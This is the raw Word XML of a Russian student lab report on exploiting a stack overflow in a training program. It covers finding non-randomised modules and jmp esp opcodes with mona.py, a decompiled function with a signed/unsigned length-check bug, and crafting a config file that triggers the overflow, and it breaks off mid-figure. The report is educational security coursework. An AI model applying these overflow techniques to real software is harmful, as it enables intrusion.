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bookmarkStart w:id="0" w:name="_Hlk110511910"/>
      <w:bookmarkEnd w:id="0"/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0CBC2653" w:rsidR="002E1B2A" w:rsidRPr="00965F2D" w:rsidRDefault="00EC5DF3" w:rsidP="002E1B2A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6958D0">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="62"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2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3ABE2F10" w14:textId="5EF30420" w:rsidR="006479BC" w:rsidRPr="006958D0" w:rsidRDefault="006958D0" w:rsidP="002E1B2A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006958D0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Исследование подходов, применяемых при эксплуатации уязвимостей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F2F470" w14:textId="2D204923" w:rsidR="002E1B2A" w:rsidRDefault="002E1B2A" w:rsidP="002E1B2A">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>по дисциплине «</w:t>
      </w:r>
      <w:r w:rsidR="008D0035">
        <w:t>Модели безопасности компьютерных систем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0B0124">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Кулеева А.Г.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761C8029" w:rsidR="009508F2" w:rsidRPr="00663210" w:rsidRDefault="009508F2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8D0035">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Овасапян Т.Д</w:t>
      </w:r>
      <w:r w:rsidR="000B0124">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037A787A" w14:textId="68D22BED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77777777" w:rsidR="002E1B2A" w:rsidRPr="00663210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5F72D7D" w14:textId="77777777" w:rsidR="000D7F80" w:rsidRPr="00663210" w:rsidRDefault="000D7F80" w:rsidP="002E1B2A">
      <w:pPr>
        <w:suppressAutoHyphens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69A7C32C" w:rsidR="002E1B2A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  <w:sectPr w:rsidR="002E1B2A" w:rsidSect="008219C3">
          <w:headerReference w:type="default" r:id="rId8"/>
          <w:footerReference w:type="default" r:id="rId9"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1134" w:right="850" w:bottom="1276" w:left="1701" w:header="708" w:footer="708" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="381"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00663210">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="007933D5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDA8E88" w14:textId="06DC692B" w:rsidR="008219C3" w:rsidRPr="0009557D" w:rsidRDefault="00E41021" w:rsidP="000D7F80">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Ц</w:t>
      </w:r>
      <w:r w:rsidR="00B17E6C">
        <w:t>ель работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670EA285" w14:textId="409FE23D" w:rsidR="008B1F14" w:rsidRDefault="006958D0" w:rsidP="00965F2D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>И</w:t>
      </w:r>
      <w:r w:rsidRPr="007773FC">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>зучение способов эксплуатации</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> уязвимостей и механизмов противодействия</w:t>
      </w:r>
      <w:r w:rsidR="002C3BD5" w:rsidRPr="002C3BD5">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A965ED" w14:textId="34BDB030" w:rsidR="006479BC" w:rsidRDefault="00E41021" w:rsidP="006479BC">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Х</w:t>
      </w:r>
      <w:r w:rsidR="006479BC">
        <w:t>од работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1D03D1" w14:textId="0D461EB4" w:rsidR="00E3146D" w:rsidRPr="00E3146D" w:rsidRDefault="00E3146D" w:rsidP="00E3146D">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Анализ уязвимой программы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC801F2" w14:textId="4D6BA752" w:rsidR="00042130" w:rsidRPr="00042130" w:rsidRDefault="00042130" w:rsidP="00042130">
      <w:r>
        <w:t xml:space="preserve">Был изучен скрипт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mona</w:t>
      </w:r>
      <w:r w:rsidRPr="00042130">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>py</w:t>
      </w:r>
      <w:r w:rsidRPr="00042130">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Immunity</w:t>
      </w:r>
      <w:r w:rsidRPr="00042130">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Debugger</w:t>
      </w:r>
      <w:r>
        <w:t>. Он предоставляет широкий функционал в разработке эксплойтов. В рамках данной работы с его помощью удалось исследовать загруженные модули, не и</w:t>
      </w:r>
      <w:r w:rsidR="0054042A">
        <w:t>с</w:t>
      </w:r>
      <w:r>
        <w:t>пользующие рандомизацию адресов (Рисунок 1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCDDE06" w14:textId="087721A7" w:rsidR="00851525" w:rsidRDefault="00042130" w:rsidP="00851525">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00042130">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D52A66F" wp14:editId="41901BB2">
            <wp:extent cx="5940425" cy="814070"/>
            <wp:effectExtent l="0" t="0" r="3175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B4F" w14:textId="73C485DC" w:rsidR="00851525" w:rsidRDefault="00851525" w:rsidP="00851525">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 1 — </w:t>
      </w:r>
      <w:r w:rsidR="00042130">
        <w:t>Модули, не использующие рандомизацию</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555034F8" w14:textId="714D27AA" w:rsidR="00042130" w:rsidRDefault="00042130" w:rsidP="00042130">
      <w:r>
        <w:t>Как оказалось, такой модуль всего один. С уязвимой программой в вари</w:t>
      </w:r>
      <w:r w:rsidR="0054042A">
        <w:t>анте также предоставляется динамическая библиотека, функцию из которой вызывает программа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F79C45" w14:textId="4695A6EC" w:rsidR="00B57594" w:rsidRPr="00B57594" w:rsidRDefault="00B57594" w:rsidP="00042130">
      <w:r>
        <w:t xml:space="preserve">Далее в найденном модуле требовалось найти </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>опкоды инструкций, необходимых для передачи управления на полезную нагрузку.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B57594">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">К таким опкодам относятся </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>call</w:t>
      </w:r>
      <w:r w:rsidRPr="001716AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:r w:rsidRPr="001716AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="001716AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>esp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>. Результат представлен на Рисунке 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEE5DD8" w14:textId="5FFFB82A" w:rsidR="001F6121" w:rsidRDefault="00B57594" w:rsidP="001F6121">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00B57594">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70491A77" wp14:editId="34369B89">
            <wp:extent cx="5940425" cy="13855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60C9" w14:textId="70D68A07" w:rsidR="00BD34E9" w:rsidRDefault="001F6121" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00C74E90">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ― </w:t>
      </w:r>
      <w:r w:rsidR="00B57594">
        <w:t>Опкоды для передачи полезной нагрузки</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="717A2E5E" w14:textId="77777777" w:rsidR="004A27C2" w:rsidRPr="004A27C2" w:rsidRDefault="004A27C2" w:rsidP="004A27C2"/>
    <w:p w14:paraId="18037178" w14:textId="1BF5C1FA" w:rsidR="00296A4E" w:rsidRDefault="00436F5C" w:rsidP="00436F5C">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Формат конфиг</w:t>
      </w:r>
      <w:r w:rsidR="009029E1">
        <w:t>урационного файла</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B5E82C" w14:textId="55E25351" w:rsidR="00436F5C" w:rsidRPr="001B764C" w:rsidRDefault="009029E1" w:rsidP="00436F5C">
      <w:r>
        <w:t xml:space="preserve">Ещё раз рассмотрим код уязвимой функции. Выделяется массив размером 2508 символов, 2500 из которых заполняется каким-то значением. Далее проверяется, что </w:t>
      </w:r>
      <w:r w:rsidR="006278DB">
        <w:t xml:space="preserve">длина допустимой строки меньше 2500, иначе </w:t>
      </w:r>
      <w:r w:rsidR="006278DB">
        <w:lastRenderedPageBreak/>
        <w:t>выводится сообщение об ошибке. В выделенную строку копируется содержимое строки из файла</w:t>
      </w:r>
      <w:r w:rsidR="001B764C">
        <w:t xml:space="preserve">, причем ровно столько байт, сколько обозначено переменной </w:t>
      </w:r>
      <w:r w:rsidR="001B764C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="001B764C" w:rsidRPr="001B764C">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="001B764C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r w:rsidR="001B764C">
        <w:t xml:space="preserve">. Далее байт номер </w:t>
      </w:r>
      <w:r w:rsidR="001B764C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dst</w:t>
      </w:r>
      <w:r w:rsidR="001B764C" w:rsidRPr="001B764C">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="001B764C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r w:rsidR="001B764C" w:rsidRPr="001B764C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001B764C">
        <w:t>зануляется и возвращается скопированная строка.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF1CFE3" w14:textId="1E91B552" w:rsidR="00FC2E7C" w:rsidRPr="00FC2E7C" w:rsidRDefault="00FC2E7C" w:rsidP="00FC2E7C">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t>int __cdecl vuln_func_sh(void *</w:t>
      </w:r>
      <w:r w:rsidR="006278DB" w:rsidRPr="006278DB">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>str_from_file</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t xml:space="preserve">, int </w:t>
      </w:r>
      <w:r w:rsidR="009029E1" w:rsidRPr="009029E1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>shell_len</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t xml:space="preserve">, int </w:t>
      </w:r>
      <w:r w:rsidR="009029E1" w:rsidRPr="009029E1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>dst_len</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC0F2BD" w14:textId="77777777" w:rsidR="00FC2E7C" w:rsidRPr="00FC2E7C" w:rsidRDefault="00FC2E7C" w:rsidP="00FC2E7C">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2CE3C6" w14:textId="32756F27" w:rsidR="00FC2E7C" w:rsidRPr="00FC2E7C" w:rsidRDefault="00FC2E7C" w:rsidP="00FC2E7C">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t xml:space="preserve">  char </w:t>
      </w:r>
      <w:r w:rsidR="009029E1" w:rsidRPr="009029E1">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t>[2508]; // [esp+1Ch] [ebp-9CCh]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2AF5B9" w14:textId="77777777" w:rsidR="00FC2E7C" w:rsidRPr="00FC2E7C" w:rsidRDefault="00FC2E7C" w:rsidP="00FC2E7C">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A21AF66" w14:textId="55E45801" w:rsidR="00FC2E7C" w:rsidRPr="00FC2E7C" w:rsidRDefault="00FC2E7C" w:rsidP="00FC2E7C">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t xml:space="preserve">  memset(</w:t>
      </w:r>
      <w:r w:rsidR="009029E1" w:rsidRPr="009029E1">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t>, 98, 2500u);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195292D4" w14:textId="78612459" w:rsidR="00FC2E7C" w:rsidRPr="00FC2E7C" w:rsidRDefault="00FC2E7C" w:rsidP="00FC2E7C">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t xml:space="preserve">  if ( (signed __int16)</w:t>
      </w:r>
      <w:r w:rsidR="009029E1" w:rsidRPr="009029E1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>shell_len</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t xml:space="preserve"> &gt; 2500 )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD7A064" w14:textId="77777777" w:rsidR="00FC2E7C" w:rsidRPr="00FC2E7C" w:rsidRDefault="00FC2E7C" w:rsidP="00FC2E7C">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t xml:space="preserve">    return puts("Error format config: data length  is very long");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E30D9D8" w14:textId="6A85269A" w:rsidR="00FC2E7C" w:rsidRPr="00FC2E7C" w:rsidRDefault="00FC2E7C" w:rsidP="00FC2E7C">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t xml:space="preserve">  memcpy(</w:t>
      </w:r>
      <w:r w:rsidR="009029E1" w:rsidRPr="009029E1">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006278DB" w:rsidRPr="006278DB">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>str_from_file</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t>, (unsigned __int16)</w:t>
      </w:r>
      <w:r w:rsidR="009029E1" w:rsidRPr="009029E1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>shell_len</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1322122E" w14:textId="5CF9FF3B" w:rsidR="00FC2E7C" w:rsidRPr="009029E1" w:rsidRDefault="00FC2E7C" w:rsidP="00FC2E7C">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="009029E1" w:rsidRPr="009029E1">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="009029E1" w:rsidRPr="009029E1">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>dst_len</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t>] = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2038F8" w14:textId="01B01AB8" w:rsidR="00FC2E7C" w:rsidRPr="00FC2E7C" w:rsidRDefault="00FC2E7C" w:rsidP="00FC2E7C">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t xml:space="preserve">  return printf("buffer: %s\n", </w:t>
      </w:r>
      <w:r w:rsidR="009029E1" w:rsidRPr="009029E1">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>str</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC2E7C">
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD35BB1" w14:textId="783635CB" w:rsidR="00FC2E7C" w:rsidRPr="00FC2E7C" w:rsidRDefault="00FC2E7C" w:rsidP="00FC2E7C">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E41021">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD28972" w14:textId="776A06EE" w:rsidR="001B764C" w:rsidRDefault="001B764C" w:rsidP="00B14963">
      <w:r>
        <w:t>Чтобы скопировать более 2500 символов передадим</w:t>
      </w:r>
      <w:r w:rsidR="00B14963">
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidR="00B14963">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="00B14963" w:rsidRPr="00B14963">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00B14963">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r w:rsidR="00B14963" w:rsidRPr="00B14963">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B14963">
        <w:t xml:space="preserve">значение </w:t>
      </w:r>
      <w:r w:rsidR="00B14963" w:rsidRPr="00B14963">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00B14963">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="006443A6">
        <w:t>8000</w:t>
      </w:r>
      <w:r w:rsidR="00B14963">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="004A27C2">
        <w:t xml:space="preserve"> Суть данной уязвимости в том, что проверяется знаковое число, которое будет меньше нуля, а копируется беззнаковое число, которое всегда больше нуля.</w:t>
      </w:r>
      <w:r w:rsidR="00B14963">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B14963" w:rsidRPr="00B14963">
        <w:t xml:space="preserve">Функция </w:t>
      </w:r>
      <w:r w:rsidR="00B14963" w:rsidRPr="00B14963">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>memcpy</w:t>
      </w:r>
      <w:r w:rsidR="00B14963" w:rsidRPr="00B14963">
        <w:t xml:space="preserve"> имеет седующий синтаксис: </w:t>
      </w:r>
      <w:r w:rsidR="00B14963" w:rsidRPr="00B14963">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>memcpy</w:t>
      </w:r>
      <w:r w:rsidR="00B14963" w:rsidRPr="00B14963">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00B14963" w:rsidRPr="00B14963">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidR="00B14963" w:rsidRPr="00B14963">
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
      <w:r w:rsidR="00B14963" w:rsidRPr="00B14963">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dest</w:t>
      </w:r>
      <w:r w:rsidR="00B14963" w:rsidRPr="00B14963">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00B14963" w:rsidRPr="00B14963">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>const</w:t>
      </w:r>
      <w:r w:rsidR="00B14963" w:rsidRPr="00B14963">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B14963" w:rsidRPr="00B14963">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidR="00B14963" w:rsidRPr="00B14963">
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
      <w:r w:rsidR="00B14963" w:rsidRPr="00B14963">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:r w:rsidR="00B14963" w:rsidRPr="00B14963">
        <w:t>, size_t count). size_t беззнаковый тип</w:t>
      </w:r>
      <w:r w:rsidR="00B14963">
        <w:t>, следовательно ему передаётся просто какое-то большое число.</w:t>
      </w:r>
      <w:r w:rsidR="00696013">
        <w:t xml:space="preserve"> В конце концов получим Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00696013">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00E917F4">
        <w:t xml:space="preserve"> После изменения данных, ломающий программу, идёт привычный старт для обозначения начала строки.</w:t>
      </w:r>
      <w:r w:rsidR="006443A6">
        <w:t xml:space="preserve"> Однако поскольку в </w:t>
      </w:r>
      <w:r w:rsidR="006443A6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>memcpy</w:t>
      </w:r>
      <w:r w:rsidR="006443A6" w:rsidRPr="006443A6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006443A6">
        <w:t xml:space="preserve">будет число 32768, то после копирования шелл-кода функция продолжит копировать мусор. Глубины стека может не хватить на </w:t>
      </w:r>
      <w:r w:rsidR="00E64319">
        <w:t xml:space="preserve">объем информации, поэтому искусственно увеличим ей с помощью рекурсии. В функции </w:t>
      </w:r>
      <w:r w:rsidR="00E64319">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>parse</w:t>
      </w:r>
      <w:r w:rsidR="00E64319" w:rsidRPr="00E64319">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="00F343D2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidR="00E64319">
        <w:t xml:space="preserve"> происходит рекурсивный вызов самой себя, если после старта не началась строка, следовательно, напишем старт много раз.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298D6535" w14:textId="25C960C8" w:rsidR="001B764C" w:rsidRDefault="004D55A3" w:rsidP="00696013">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="004D55A3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39929B6B" wp14:editId="24C603BC">
            <wp:extent cx="5940425" cy="995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93CF" w14:textId="19F6ABB1" w:rsidR="00E917F4" w:rsidRPr="00E917F4" w:rsidRDefault="00E917F4" w:rsidP="00E917F4">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Изменение параметров конфига</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63309A9A" w14:textId="35D704D3" w:rsidR="001B764C" w:rsidRDefault="007D412B" w:rsidP="002212A3">
      <w:r>
        <w:t>Далее по смещению 0х495 начинается искусственная строка, которая должна дополнить имеющуюся в конфиге до 2500 символов</w:t>
      </w:r>
      <w:r w:rsidR="000A4A35">
        <w:t xml:space="preserve"> (Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="000A4A35">
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>0х495 – 0х30 (информационные байты в начале) = 1125</w:t>
      </w:r>
      <w:r w:rsidR="000A4A35">
        <w:t xml:space="preserve">, что равняется изначальной длине </w:t>
      </w:r>
      <w:r w:rsidR="000A4A35">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="000A4A35" w:rsidRPr="000A4A35">
        <w:t>_</w:t>
      </w:r>
      <w:r w:rsidR="000A4A35">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r w:rsidR="000A4A35">
        <w:t>, без терминирующего нуля.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34077E4D" w14:textId="3A83DAF7" w:rsidR="007D412B" w:rsidRDefault="007D412B" w:rsidP="007D412B">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="007D412B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
